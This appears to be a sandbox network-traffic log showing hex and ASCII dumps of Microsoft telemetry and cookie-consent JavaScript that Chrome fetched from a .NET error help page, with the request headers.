2023-05-31 15:08:31 UTC	70	IN	Data Raw: 6e 3d 46 73 28 65 2c 21 30 29 29 2c 30 21 3d 3d 6e 5b 56 6f 5d 28 74 29 26 26 22 53 74 72 69 6e 67 22 21 3d 3d 74 3f 74 2b 22 3a 22 2b 6e 3a 6e 7d 63 61 74 63 68 28 72 29 7b 7d 72 65 74 75 72 6e 22 22 2b 28 65 7c 7c 22 22 29 7d 58 73 2e 43 72 65 61 74 65 41 75 74 6f 45 78 63 65 70 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 69 2c 61 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 4b 73 28 69 7c 7c 61 7c 7c 65 29 2c 75 3d 7b 7d 3b 72 65 74 75 72 6e 20 75 5b 4d 6f 5d 3d 71 73 28 65 2c 63 29 2c 75 2e 75 72 6c 3d 74 2c 75 2e 6c 69 6e 65 4e 75 6d 62 65 72 3d 6e 2c 75 2e 63 6f 6c 75 6d 6e 4e 75 6d 62 65 72 3d 72 2c 75 2e 65 72 72 6f 72 3d 57 73 28 69 7c 7c 61 7c 7c 65 29 2c 75 2e 65 76 74 3d 57 73 28 61 7c 7c 65 29 2c 75 5b 6a 6f 5d 3d 63 2c 75 2e 73 Data Ascii: n=Fs(e,!0)),0!==n[Vo](t)&&"String"!==t?t+":"+n:n}catch(r){}return""+(e\|\|"")}Xs.CreateAutoException=function(e,t,n,r,i,a,o,s){var c=Ks(i\|\|a\|\|e),u={};return u[Mo]=qs(e,c),u.url=t,u.lineNumber=n,u.columnNumber=r,u.error=Ws(i\|\|a\|\|e),u.evt=Ws(a\|\|e),u[jo]=c,u.s
2023-05-31 15:08:31 UTC	134	IN	Data Raw: 56 69 65 77 50 65 72 66 6f 72 6d 61 6e 63 65 20 66 61 69 6c 65 64 2c 20 70 61 67 65 20 76 69 65 77 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 68 28 6e 29 2c 7b 65 78 63 65 70 74 69 6f 6e 3a 73 65 28 6e 29 7d 29 7d 7d 2c 53 2e 73 74 61 72 74 54 72 61 63 6b 50 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3b 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 28 74 3d 6f 65 28 29 29 26 26 74 2e 74 69 74 6c 65 7c 7c 22 22 29 2c 41 2e 73 74 61 72 74 28 65 29 7d 63 61 74 63 68 28 6e 29 7b 64 28 31 2c 33 31 2c 22 73 74 61 72 74 54 72 61 63 6b 50 61 67 65 20 66 61 69 6c 65 64 2c 20 70 61 67 65 20 76 69 65 77 20 6d 61 79 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b Data Ascii: ViewPerformance failed, page view will not be collected: "+h(n),{exception:se(n)})}},S.startTrackPage=function(e){try{var t;"string"!=typeof e&&(e=(t=oe())&&t.title\|\|""),A.start(e)}catch(n){d(1,31,"startTrackPage failed, page view may not be collected: "+
2023-05-31 15:08:31 UTC	150	IN	Data Raw: 3d 74 79 70 65 6f 66 28 69 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 63 61 6c 6c 62 61 63 6b 2e 70 61 67 65 41 63 74 69 6f 6e 43 6f 6e 74 65 6e 74 54 61 67 73 29 3f 69 28 65 29 3a 7b 7d 2c 74 26 26 74 2e 63 6f 6e 74 65 6e 74 54 61 67 73 3f 74 2e 63 6f 6e 74 65 6e 74 54 61 67 73 3a 7b 7d 29 29 2c 61 2e 63 6f 6e 74 65 6e 74 3d 74 68 69 73 2e 5f 67 65 74 43 6f 6e 74 65 6e 74 46 6f 72 6d 61 74 74 65 64 28 73 29 2c 6e 2e 74 69 6d 65 54 6f 41 63 74 69 6f 6e 3d 74 68 69 73 2e 5f 67 65 74 54 69 6d 65 54 6f 43 6c 69 63 6b 28 29 2c 6e 2e 72 65 66 55 72 69 3d 75 65 28 74 2e 72 65 66 55 72 69 29 3f 74 2e 72 65 66 55 72 69 3a 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 63 6f 72 65 44 61 74 61 2e 72 65 66 65 72 72 65 72 55 72 69 2c 58 75 28 74 68 69 73 2e 5f 63 6f 6e 66 69 Data Ascii: =typeof(i=this._config.callback.pageActionContentTags)?i(e):{},t&&t.contentTags?t.contentTags:{})),a.content=this._getContentFormatted(s),n.timeToAction=this._getTimeToClick(),n.refUri=ue(t.refUri)?t.refUri:this._config.coreData.referrerUri,Xu(this._confi
2023-05-31 15:08:31 UTC	166	IN	Data Raw: 64 61 74 65 28 65 2c 74 29 7d 2c 66 2e 63 61 70 74 75 72 65 43 6f 6e 74 65 6e 74 55 70 64 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 68 2e 63 61 70 74 75 72 65 43 6f 6e 74 65 6e 74 55 70 64 61 74 65 28 65 2c 74 29 7d 2c 66 2e 74 72 61 63 6b 50 61 67 65 55 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 7c 7c 28 69 3d 21 30 2c 6d 2e 74 72 61 63 6b 50 61 67 65 55 6e 6c 6f 61 64 28 65 2c 74 29 29 7d 2c 66 2e 63 61 70 74 75 72 65 50 61 67 65 55 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 7c 7c 28 69 3d 21 30 2c 6d 2e 63 61 70 74 75 72 65 50 61 67 65 55 6e 6c 6f 61 64 28 65 2c 74 29 29 7d 2c 66 2e 5f 70 6f 70 75 6c 61 74 65 50 61 67 65 56 69 65 77 50 65 72 66 6f 72 6d 61 6e 63 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 Data Ascii: date(e,t)},f.captureContentUpdate=function(e,t){h.captureContentUpdate(e,t)},f.trackPageUnload=function(e,t){i\|\|(i=!0,m.trackPageUnload(e,t))},f.capturePageUnload=function(e,t){i\|\|(i=!0,m.capturePageUnload(e,t))},f._populatePageViewPerformance=function(e)
2023-05-31 15:08:31 UTC	182	IN	Data Raw: 30 30 2c 7b 7d 2c 65 29 2c 66 28 65 29 7d 2c 72 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6d 28 74 2c 34 30 30 2c 7b 7d 29 7d 2c 72 2e 6f 6e 74 69 6d 65 6f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6d 28 74 2c 35 30 30 2c 7b 7d 29 7d 2c 72 2e 6f 6e 70 72 6f 67 72 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6e 3f 72 2e 73 65 6e 64 28 65 2e 64 61 74 61 29 3a 78 2e 73 65 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 73 65 6e 64 28 65 2e 64 61 74 61 29 7d 2c 30 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 69 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 65 2e 75 72 6c 53 74 72 69 6e 67 2c 61 3d 21 31 2c 6f 3d 21 31 3b 28 6e 3d 7b 62 6f 64 79 3a 65 2e 64 61 74 61 2c 6d 65 74 68 6f 64 3a 47 6c 7d 29 2e 4d 69 63 72 6f 73 6f 66 74 5f 41 70 70 6c 69 Data Ascii: 00,{},e),f(e)},r.onerror=function(){m(t,400,{})},r.ontimeout=function(){m(t,500,{})},r.onprogress=function(){},n?r.send(e.data):x.set(function(){r.send(e.data)},0)}function o(e,i,t){var n,r=e.urlString,a=!1,o=!1;(n={body:e.data,method:Gl}).Microsoft_Appli
2023-05-31 15:08:31 UTC	269	IN	Data Raw: 65 2c 74 2c 6e 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 21 30 29 2c 55 7c 7c 28 6e 3d 6e 7c 7c 31 2c 65 3f 6e 75 6c 6c 3d 3d 4c 3f 28 63 28 29 2c 6d 28 31 2c 30 2c 6e 29 2c 4c 3d 73 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 3d 6e 75 6c 6c 2c 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 61 28 31 2c 30 2c 74 29 2c 68 28 29 2c 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 44 2e 69 73 43 6f 6d 70 6c 65 74 65 6c 79 49 64 6c 65 28 29 3f 65 28 29 3a 4c 3d 73 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 3d 6e 75 6c 6c 2c 6e 28 65 29 7d 2c 2e 32 35 29 7d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 26 26 65 28 29 2c 30 3c 52 2e 6c 65 6e 67 74 68 3f 4c 3d 73 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 3d 6e 75 6c 6c 2c 72 28 52 2e 73 68 69 66 74 28 29 2c 74 29 7d 2c 30 29 3a Data Ascii: e,t,n){void 0===e&&(e=!0),U\|\|(n=n\|\|1,e?null==L?(c(),m(1,0,n),L=s(function(){L=null,function r(e,t){a(1,0,t),h(),function n(e){D.isCompletelyIdle()?e():L=s(function(){L=null,n(e)},.25)}(function(){e&&e(),0<R.length?L=s(function(){L=null,r(R.shift(),t)},0):
2023-05-31 15:08:31 UTC	285	IN	Data Raw: 65 49 44 22 2c 67 70 3d 22 73 70 61 6e 49 44 22 2c 76 70 3d 22 74 72 61 63 65 46 6c 61 67 73 22 2c 68 70 3d 22 63 6f 6e 74 65 78 74 22 2c 6d 70 3d 22 61 62 6f 72 74 65 64 22 2c 79 70 3d 22 74 72 61 63 65 49 64 22 2c 43 70 3d 22 73 70 61 6e 49 64 22 2c 62 70 3d 22 63 6f 72 65 22 2c 54 70 3d 22 69 6e 63 6c 75 64 65 43 6f 72 72 65 6c 61 74 69 6f 6e 48 65 61 64 65 72 73 22 2c 49 70 3d 22 63 61 6e 49 6e 63 6c 75 64 65 43 6f 72 72 65 6c 61 74 69 6f 6e 48 65 61 64 65 72 22 2c 45 70 3d 22 67 65 74 41 62 73 6f 6c 75 74 65 55 72 6c 22 2c 5f 70 3d 22 68 65 61 64 65 72 73 22 2c 78 70 3d 22 72 65 71 75 65 73 74 48 65 61 64 65 72 73 22 2c 53 70 3d 22 61 70 70 49 64 22 2c 4e 70 3d 22 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 22 2c 44 70 3d 22 74 72 61 63 6b 44 65 Data Ascii: eID",gp="spanID",vp="traceFlags",hp="context",mp="aborted",yp="traceId",Cp="spanId",bp="core",Tp="includeCorrelationHeaders",Ip="canIncludeCorrelationHeader",Ep="getAbsoluteUrl",_p="headers",xp="requestHeaders",Sp="appId",Np="setRequestHeader",Dp="trackDe
2023-05-31 15:08:31 UTC	301	IN	Data Raw: 2e 72 65 73 70 6f 6e 73 65 53 69 7a 65 42 79 74 65 73 29 26 26 28 65 2e 62 61 73 65 44 61 74 61 2e 72 65 73 70 6f 6e 73 65 53 69 7a 65 42 79 74 65 73 3d 74 2e 72 65 73 70 6f 6e 73 65 53 69 7a 65 42 79 74 65 73 29 7d 3b 76 61 72 20 71 67 2c 42 67 3d 7a 67 3b 66 75 6e 63 74 69 6f 6e 20 7a 67 28 29 7b 74 68 69 73 2e 5f 71 6f 73 45 76 65 6e 74 3d 6e 65 77 20 55 67 7d 66 75 6e 63 74 69 6f 6e 20 6a 67 28 29 7b 76 61 72 20 66 2c 61 2c 6f 2c 64 2c 70 2c 65 3d 71 67 2e 63 61 6c 6c 28 74 68 69 73 29 7c 7c 74 68 69 73 3b 72 65 74 75 72 6e 20 65 2e 69 64 65 6e 74 69 66 69 65 72 3d 22 51 6f 73 50 6c 75 67 69 6e 22 2c 65 2e 76 65 72 73 69 6f 6e 3d 22 33 2e 32 2e 31 31 22 2c 72 65 28 6a 67 2c 65 2c 66 75 6e 63 74 69 6f 6e 28 75 2c 6c 29 7b 66 75 6e 63 74 69 6f 6e 20 72 Data Ascii: .responseSizeBytes)&&(e.baseData.responseSizeBytes=t.responseSizeBytes)};var qg,Bg=zg;function zg(){this._qosEvent=new Ug}function jg(){var f,a,o,d,p,e=qg.call(this)\|\|this;return e.identifier="QosPlugin",e.version="3.2.11",re(jg,e,function(u,l){function r
2023-05-31 15:08:31 UTC	317	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 28 22 67 65 74 50 61 67 65 56 69 65 77 49 6d 70 72 65 73 73 69 6f 6e 47 75 69 64 22 29 2c 22 22 7d 3b 76 61 72 20 6e 76 3d 72 76 3b 66 75 6e 63 74 69 6f 6e 20 72 76 28 65 29 7b 74 68 69 73 2e 5f 73 6b 75 3d 65 7d 61 76 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 28 22 49 78 20 69 6e 69 74 22 29 7d 2c 61 76 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 28 22 49 78 20 73 65 74 22 29 7d 3b 76 61 72 20 69 76 3d 61 76 3b 66 75 6e 63 74 69 6f 6e 20 61 76 28 29 7b 74 68 69 73 2e 74 65 73 74 48 6f 6f 6b 3d 7b 7d 7d 73 76 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 6f 76 3d 73 76 3b 66 75 6e 63 74 69 6f 6e 20 73 76 28 65 29 7b 76 Data Ascii: unction(){return o("getPageViewImpressionGuid"),""};var nv=rv;function rv(e){this._sku=e}av.prototype.init=function(e){o("Ix init")},av.prototype.set=function(e){o("Ix set")};var iv=av;function av(){this.testHook={}}sv.__ieDyn=1;var ov=sv;function sv(e){v

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49199	13.107.237.60	443	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-05-31 15:08:31 UTC	5	OUT	GET /mscc/lib/v2/wcp-consent.js HTTP/1.1 Host: wcpstatic.microsoft.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: / Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TelexCopy.png&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-05-31 15:08:31 UTC	21	IN	HTTP/1.1 200 OK Cache-Control: max-age=43200 Content-Length: 279220 Content-Type: application/javascript Content-MD5: X1JOIM5h9UISVFS6+GfEew== Last-Modified: Wed, 24 Aug 2022 17:34:36 GMT Accept-Ranges: bytes Age: 8219 ETag: 0x8DA85F6EA62BF74 Vary: Accept-Encoding Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding X-Cache: CONFIG_NOCACHE x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 96c17399-701e-0020-49be-93a640000000 x-ms-version: 2009-09-19 X-Azure-Ref: 072J3ZAAAAADgGRJ5EU5mSJVoR5G/wq/9RlJBMzFFREdFMDMxNQAzOWI0NjE1Ny1jYjllLTQ5YjctYTY1YS04NzIyYTNmODI0ZTQ= Date: Wed, 31 May 2023 15:08:31 GMT Connection: close
2023-05-31 15:08:31 UTC	22	IN	Data Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 61 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 6e 29 7b 69 66 28 61 5b 6e 5d 29 72 65 74 75 72 6e 20 61 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 61 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 69 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 69 2e 6d 3d 65 2c 69 2e 63 3d 61 2c 69 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var a={};function i(n){if(a[n])return a[n].exports;var o=a[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,i),o.l=!0,o.exports}return i.m=e,i.c=a,i.d=function(e
2023-05-31 15:08:31 UTC	30	IN	Data Raw: 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 38 30 25 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 31 39 70 78 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 65 67 6f 65 20 55 49 2c 20 53 65 67 6f 65 55 49 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 64 69 76 5b 64 69 72 3d 22 72 74 6c 22 5d 20 2e 5f 33 52 4a 7a 65 4c 33 6c 39 52 6c 5f 6c 41 51 Data Ascii: dding-right:0;width:80%;width:calc(100% - 19px);font-family:Segoe UI, SegoeUI, Arial, sans-serif;font-style:normal;font-weight:normal;font-size:15px;line-height:20px;text-transform:none;cursor:pointer;box-sizing:border-box}div[dir="rtl"] ._3RJzeL3l9Rl_lAQ
2023-05-31 15:08:31 UTC	86	IN	Data Raw: 61 2d 6c 61 62 65 6c 3d 22 27 2b 74 2e 65 73 63 61 70 65 48 74 6d 6c 28 74 68 69 73 2e 74 65 78 74 52 65 73 6f 75 72 63 65 73 2e 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 43 6c 6f 73 65 4c 61 62 65 6c 29 2b 27 22 20 63 6c 61 73 73 3d 22 27 2b 72 2e 63 6c 6f 73 65 4d 6f 64 61 6c 49 63 6f 6e 2b 27 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 26 23 78 32 37 31 35 3b 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 64 6f 63 75 6d 65 6e 74 22 20 63 6c 61 73 73 3d 22 27 2b 72 2e 6d 6f 64 61 6c 42 6f 64 79 2b 27 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 27 2b 72 2e 6d 6f Data Ascii: a-label="'+t.escapeHtml(this.textResources.preferencesDialogCloseLabel)+'" class="'+r.closeModalIcon+'" tabindex="0">✕</button>\n <div role="document" class="'+r.modalBody+'">\n <div>\n <h1 class="'+r.mo
2023-05-31 15:08:31 UTC	94	IN	Data Raw: 65 2b 2b 29 7d 7d 7d 2c 65 7d 28 29 2c 6c 3d 6e 2e 6c 6f 63 61 6c 73 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 7d 72 65 74 75 72 6e 20 65 2e 63 72 65 61 74 65 54 68 65 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 69 66 28 21 61 5b 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2d 62 65 74 77 65 65 6e 2d 70 61 67 65 2d 61 6e 64 2d 64 69 61 6c 6f 67 22 5d 29 7b 76 61 72 20 69 3d 61 5b 22 64 69 61 6c 6f 67 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 3b 74 68 69 73 2e 73 65 74 4d 69 73 73 69 6e 67 43 6f 6c 6f 72 46 72 6f 6d 41 6e 6f 74 68 65 72 50 72 6f 70 65 72 74 79 28 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2d 62 65 74 77 65 65 6e 2d 70 61 67 65 2d 61 6e 64 2d 64 69 61 6c 6f 67 22 2c Data Ascii: e++)}}},e}(),l=n.locals,c=function(){function e(){}return e.createTheme=function(e,a){if(!a["background-color-between-page-and-dialog"]){var i=a["dialog-background-color"];this.setMissingColorFromAnotherProperty("background-color-between-page-and-dialog",
2023-05-31 15:08:31 UTC	102	IN	Data Raw: 20 20 Data Ascii:
2023-05-31 15:08:31 UTC	102	IN	Data Raw: 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-button-
2023-05-31 15:08:31 UTC	110	IN	Data Raw: 65 70 74 41 6c 6c 4c 61 62 65 6c 29 2b 27 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 27 2b 62 2e 62 61 6e 6e 65 72 42 75 74 74 6f 6e 2b 22 20 22 2b 62 2e 73 65 63 6f 6e 64 61 72 79 42 75 74 74 6f 6e 54 68 65 6d 65 2b 27 22 3e 27 2b 74 2e 65 73 63 61 70 65 48 74 6d 6c 28 74 68 69 73 2e 74 65 78 74 52 65 73 6f 75 72 63 65 73 2e 72 65 6a 65 63 74 41 6c 6c 4c 61 62 65 6c 29 2b 27 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 27 2b 62 2e 62 61 6e 6e 65 72 42 75 74 74 6f 6e 2b 22 20 22 2b 62 2e 73 65 63 6f 6e 64 61 72 79 42 75 74 74 6f 6e 54 Data Ascii: eptAllLabel)+'</button>\n <button type="button" class="'+b.bannerButton+" "+b.secondaryButtonTheme+'">'+t.escapeHtml(this.textResources.rejectAllLabel)+'</button>\n <button type="button" class="'+b.bannerButton+" "+b.secondaryButtonT
2023-05-31 15:08:31 UTC	118	IN	Data Raw: 6f 72 74 65 64 2c 20 73 65 74 74 69 6e 67 20 63 6f 6e 73 65 6e 74 20 69 73 20 68 61 6e 64 6c 65 64 20 62 79 20 6c 69 62 72 61 72 79 22 29 7d 2c 65 2e 68 61 73 43 6f 6e 73 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 28 29 7d 2c 65 2e 69 73 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 77 63 70 43 6f 6e 73 65 6e 74 42 61 6e 6e 65 72 43 74 72 6c 22 29 7d 2c 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 61 3d 5b 5d 2c 69 3d 31 3b 69 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 61 5b 69 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 69 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 Data Ascii: orted, setting consent is handled by library")},e.hasConsent=function(){return g()},e.isVisible=function(){return!!document.getElementById("wcpConsentBannerCtrl")},e.emit=function(e){for(var a=[],i=1;i<arguments.length;i++)a[i-1]=arguments[i];var n=this.e
2023-05-31 15:08:31 UTC	126	IN	Data Raw: 79 6f 75 20 63 6c 69 63 6b 20 6f 6e 20 6f 72 20 70 75 72 63 68 61 73 65 73 20 79 6f 75 20 6d 61 6b 65 20 61 66 74 65 72 20 63 6c 69 63 6b 69 6e 67 20 6f 6e 20 61 6e 20 61 64 20 66 6f 72 20 70 61 79 6d 65 6e 74 20 70 75 72 70 6f 73 65 73 2c 20 61 6e 64 20 74 6f 20 73 68 6f 77 20 79 6f 75 20 61 64 73 20 74 68 61 74 20 61 72 65 20 6d 6f 72 65 20 72 65 6c 65 76 61 6e 74 20 74 6f 20 79 6f 75 2e 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 74 68 65 79 27 72 65 20 75 73 65 64 20 74 6f 20 64 65 74 65 63 74 20 77 68 65 6e 20 79 6f 75 20 63 6c 69 63 6b 20 6f 6e 20 61 6e 20 61 64 20 61 6e 64 20 73 68 6f 77 20 79 6f 75 20 61 64 73 20 62 61 73 65 64 20 6f 6e 20 79 6f 75 72 20 73 6f 63 69 61 6c 20 6d 65 64 69 61 20 69 6e 74 65 72 65 73 74 73 20 61 6e 64 20 77 65 62 73 69 Data Ascii: you click on or purchases you make after clicking on an ad for payment purposes, and to show you ads that are more relevant to you. For example, they're used to detect when you click on an ad and show you ads based on your social media interests and websi
2023-05-31 15:08:31 UTC	197	IN	Data Raw: d9 84 d9 81 d8 a7 d8 aa 20 d8 aa d8 b9 d8 b1 d9 8a d9 81 20 d8 a7 d9 84 d8 a7 d8 b1 d8 aa d8 a8 d8 a7 d8 b7 20 d8 b9 d9 84 d9 89 20 d9 88 d8 b3 d8 a7 d8 a6 d9 84 20 d8 a7 d9 84 d8 aa d9 88 d8 a7 d8 b5 d9 84 20 d8 a7 d9 84 d8 a7 d8 ac d8 aa d9 85 d8 a7 d8 b9 d9 8a 20 d9 84 d8 b9 d8 b1 d8 b6 20 d8 a7 d9 84 d8 a5 d8 b9 d9 84 d8 a7 d9 86 d8 a7 d8 aa 20 d9 88 d8 a7 d9 84 d9 85 d8 ad d8 aa d9 88 d9 89 20 d8 a7 d8 b3 d8 aa d9 86 d8 a7 d8 af d9 8b d8 a7 20 d8 a5 d9 84 d9 89 20 d9 85 d9 84 d9 81 d8 a7 d8 aa 20 d8 aa d8 b9 d8 b1 d9 8a d9 81 d9 83 20 d8 b9 d9 84 d9 89 20 d9 88 d8 b3 d8 a7 d8 a6 d9 84 20 d8 a7 d9 84 d8 aa d9 88 d8 a7 d8 b5 d9 84 20 d8 a7 d9 84 d8 a7 d8 ac d8 aa d9 85 d8 a7 d8 b9 d9 8a 20 d9 88 d8 a7 d9 84 d9 86 d8 b4 d8 a7 d8 b7 20 d8 b9 d9 84 d9 89 Data Ascii:
